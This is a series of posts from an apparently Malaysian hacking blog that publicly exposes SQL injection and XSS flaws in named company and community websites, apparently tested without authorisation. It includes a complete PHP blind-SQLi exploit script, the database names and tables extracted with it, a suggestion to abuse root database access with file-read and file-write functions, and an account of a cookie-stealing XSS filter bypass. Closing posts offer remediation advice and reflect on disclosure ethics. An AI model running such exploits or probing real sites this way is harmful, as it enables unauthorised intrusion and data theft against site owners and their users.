HACKED: www.proton-edar.com.my prone to SQL Injection Attacks

Website: Proton Edar Sdn Bhd
URL: http://www.proton-edar.com.my/

From Proton Edar:
Proton Edar has achieved a commendable success in building PROTON brand name as the pride of the nation. Proton's success story is testimony of its product quality and excellent service.

An hour ago I found a vulnerability on perodua's website, now, another comes in. The similarities between these two company (if u dont know) is, both are leading companies selling cars in our local country. I think the main reason why their website is lack of security is because they are too busy selling cars. hmm.. ok.. thats acceptable.. Anyway, me myself owns a Proton Savvy. =)


Here it is, screenshot showing accessible databases. With user root, think of what you can do? load_file() and into OUTFILE function maybe? =)

HACKED: www.perodua.com.my prone to blind SQL Injection Attacks

Website: Perusahaan Otomobil Kedua Sdn Bhd (PERODUA)
URL: http://www.perodua.com.my/

FROM Perodua:
Perusahaan Otomobil Kedua Sdn Bhd (PERODUA), established in 1993, is a joint venture company between Malaysian and Japanese partners. The shareholders of Perodua are UMW Corporation Sdn Bhd with 38% stake, Daihatsu Motor Co. Ltd. (20%), MBM Resources Bhd (20%), PNB Equity Resources Corporation Sdn Bhd (10%), Mitsui & Co. Ltd (7%) and Daihatsu (Malaysia) Sdn Bhd (5%).

The Perodua Rusa - March 1996
The Perodua Kembara - August 1998
The Perodua Kenari - June 2000
The Perodua Kelisa - August 2001
The Perodua Myvi - May 2005
The Perodua Viva - May 2007
The Perodua Nautica 4WD - May 2008

Hello World. This is my first post relating to blind SQL injection. A great thanks and bow to sifu d3ck4 for helping me understand more about blind SQLi. Well, its kinda boring to post non-government websites on this site, (tak thrill lah). I hope you guys out there still enjoy reading the blog without the .gov.my sites.. '-_- But anyway, here it is. Perodua.com.my exposed to blind sql injection attacks as we can see from my first screenshot, I injected 1=1 string, ofcourse 1=1 will always return true. Then on my second screenshot, I injected 1=2, which will return false, lets see if there are any changes from the website. Go on, take a look. =)


Once its there,



Now its gone, (macam biskut la ni)



The version is mysql version 4. I have to use one of my favorite script to guess the tables and columns, since we cannot look for table names in information_schema, its not that efficient but, it does the work for me tho. =)

HACKED: www.php.net.my prone to Blind SQL Injection Attacks

as this blog getting more and more crowd every single day (ahh.. we r public attention, we famous ;-), i decided to digging around for "Hacking Expose!" via google, and stumble upon one well known community website
at http://www.php.net.my/forum/thread.php/15/3854/1 and one of the poster were shout to point to this blog and the his posting sounds like this

http://hackingexpose.blogspot.com/

banyak yg tembus sql. ape da. 2009 dah nih.

then im getting curious to know, so the journey begin..

the issue..

Website: Kumpulan Pengguna PHP Malaysia
URL: http://www.php.net.my


the database user() fingerprinting as follow



so i end up writing some simple automation exploit for this, in php of cos, as im also "Pengguna PHP in Malaysia" ;-) the exploit can fuzz the parameter supplied (example table_name, column_name,) and will test the first char by char that return true statement. here the code :

function usage ()
{
echo "\nBlind (my)SQL Injection Exploit/Fuzzer".
"\nby 0x3a, hacking.expose@gmail.com\n".
"\nspecially made for www.php.net.my ;-)".
"\n\n";
exit ();
}


function query ($func, $chr, $pos)
{
// custom ur query as u like

$query = "15 AND ascii(substring((SELECT group_concat({$func}) from information_schema.tables where table_schema=database()),{$pos},1))={$chr}";

//$query = "15 AND ascii(substring((SELECT group_concat({$func}) from information_schema.columns where table_name=0x63686174746572 limit 0,1),{$pos},1))={$chr}";
//$query = "15 AND ascii(substring((user()),{$pos},1))={$chr}";
//$query = "15 AND ascii(substring((database()),{$pos},1))={$chr}";
//$query = "15 AND ascii(substring((@@version),{$pos},1))={$chr}";

$query = str_replace (" ", "%20", $query);
$query = str_replace ("'", "%27", $query);
return $query;
}

function exploit ($host, $path, $func, $pos, $chr)
{
$chr = ord ($chr);
$fp = fsockopen ($host, 80);
$query = query ($func, $chr, $pos);
$request = "GET {$path}/replace/path/here/{$query} HTTP/1.1\r\n".
"Host: {$host}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);
while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);

if (preg_match ("/replace your expected string here/", $reply))
return true;
else
return false;
}


if ($argc != 4)

usage ();

$host = $argv [1];
$path = $argv [2];
$func = $argv [3];
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,-_.";
$pos = 1;
$chr = 0;

echo "\nResult: ";

while ($pos <= 99999)
{
if (exploit ($host, $path, $func, $pos, $key [$chr]))
{
echo $key [$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
?>

from the automation i came with the result as below (fuzzing the table_name, database, version)



as for the final result:

USER: phpnetmy_main@localhost
DATABASE: phpnetmy
VERSION: 5.0.67-community

TABLES:

chat
chatter
event
event_participants
fm_file
forum_category
forum_file_attach
forum_forums
forum_posts
forum_smileys
forum_smileys_code
forum_temp_attach
forum_topics
hds

the problem is common, in which the script not validate for user supplied input before use in SQL query. by removing the database error message but not fixing the core issue is not the solution. php.net.my has been contacted and waiting for reply.


Glossary:

Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application rather then getting a useful error message they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through sql statements.

HACKED: innit.nuffnang.com prone to XSS and possible Blind SQL Injection attacks

Hello World!

life feels incomplete when theres nothing to be post here, enough with those phrank were done here (no more phrank promise ;-) unfortunately we decided to keep calm with those gov sites (slow down cowboy..) because there are so many people were "loud" when we too exposing them. infact we were call to pull down all post related to gov.my (for a while, sory guys). finish with this pathetic story, so here we go..

as you all well known Nuffnang.com is Asia’s first and leading blog advertising community.

their online platform allows advertisers to serve graphic or video based advertisements onto the thousands of local blogs that are signed up with them.

to date, over 80,000 bloggers have signed up with their platform in Singapore, Malaysia, Philippines and australia.

their ranks grow everyday.

their advertiser rollcall includes bluechips such as Citibank, Honda, Walls, AirAsia, Nokia, Nike, Nescafe, Twisties, and more.

beyond blog advertising, they also pride theirselves in being a community for bloggers by bloggers.

Nuffnang has been featured on mainstream newspapers like The Star, Malaysia and The Sunday Times, Singapore, amongst other media.

the issue..

Website: Nuffnang Community Blog Aggregator
URL: http://innit.nuffnang.com

from the site

Nuffnang’s very own blog aggregator is here! Innit revolutionalizes the Nuffnang community by helping Nuffnangers build each other’s traffic, share topics, and vote on blog entries they find interesting.

we bump to this site and found Cross Site Scripting and possible SQL Injection vulnerabilities. in term of XSS, the script seems to filter out the quote character (') using addslashes function in php. so we end up to bypass this filter using the ninja String.fromCharCode() javascript function. the Proof of Concept as below



and here the credential information pull out from remote xss.js script at ha.ckers.org. this assume that the risk for cookie stealing is high. (w00t! w00t!)



and for the sql injection, the scripts tell the world about its SQL query. this might be prone to Blind Sql Injection if properly reconstruct the injection query. as im not motivate to do the rest, im done here. the problem is common, in which the script does not filtered for user input. Nuffnang has been contacted and waiting for reply.




Solution:

fundamentally, this means that all web application output impacted by any user must be filtered (so characters that can cause this problem are removed), encoded (so the characters that can cause this problem are encoded in a way to prevent the problem), or validated (to ensure that only "safe" data gets through). This includes all output derived from input such as URL parameters, form data, cookies, database queries, CORBA ORB results, and data from users stored in files. In many cases, filtering and validation should be done at the input, but encoding can be done during either input validation or output generation. If you're just passing the data through without analysis, it's probably better to encode the data on input (so it won't be forgotten). However, if your program processes the data, it can be easier to encode it on output instead. CERT recommends that filtering and encoding be done during data output; this isn't a bad idea, but there are many cases where it makes sense to do it at input instead. The critical issue is to make sure that you cover all cases for every output, which is not an easy thing to do regardless of approach.



P/S:

Hacking Expose! Team would like to apologize and ask for forgiveness to whom may concern regarding to full disclosure of government sites (we admit that putting the uncensored/unblurred screenshot is our biggest mistake). To make it clear, it does not come to our intention to put everyone in the highest risk. As our most intention is to keep malaysian sites hacker safe and admin awareness. Peace!

Calm down my fella

dear contributors, especially to admin@vex, n others..

as you note this past few weeks and future, our blogs will receive more and more hits while they keep suggesting, commenting, criticizing, and enjoying reading this blog.

i would like to remind yo guys to keep LOW PROFILE, CLEAR TRACKS of yo personal belonging available here. dont do malicious harm to our beloved test server.

so again, be "a little bit ethical n professionals" although we are still doing this (we can say dirty job here) in implementation but still keep our intention "suci, murni and tulus" because we are not posting "how to hack/deface .gov.my, either we are not yet another ZONE-h.com.my ;-) remember these tagline:

"AN INTENTION TO KEEP MALAYSIAN SITES HACKER SAFE AND ADMIN AWARENESS!"

so from now on.. i would like to change our assessment which must commit n consist of following step involve:

1.) rock on! find yo target!

2.) do a simple test.. i mean here as simple as producing ERROR

3.) report to admin about ur findings AS SOON AS YOU FOUND ONE!

4.) ask for consent n permission to resume ur test which may lead to your PoC etc.. blablabla (i bet u cant get admin reply either ;-)

5.) zzZZ.. waiting for their patch..........

6.) ask permission to do full disclosure in this blog..

7.) he may ask.. (and ur answer, all this for you and everyone good sake! we are not yet another adsense blog tho!)

8.) CENSORED! screen shot CENSORED!

until then, bye-bye.. were off!

P/S: we are waiting for those admin reply, they will be no new post for now until we got the permission to expose, consent you say?

Should us or should us not?

Should us shutting down this blog asap, sooner or later and why?

well we do a survey on various people opinion which is also my friends and former members group in malaysia about this yet another security blog (from end user, leet system admin to senior security consultant).

so from their point of view, there are lots of pros and cons were discussed about this blog especially in term of information disclosure and malaysian cyber law and act. so here we would like you our readers to submit a poll (on sidebar) and feel free to write suggestion or criticize as you like at the comment section.


p/s: if not us, who will? "an intention to make better malaysian, hacker safe and admin awareness!"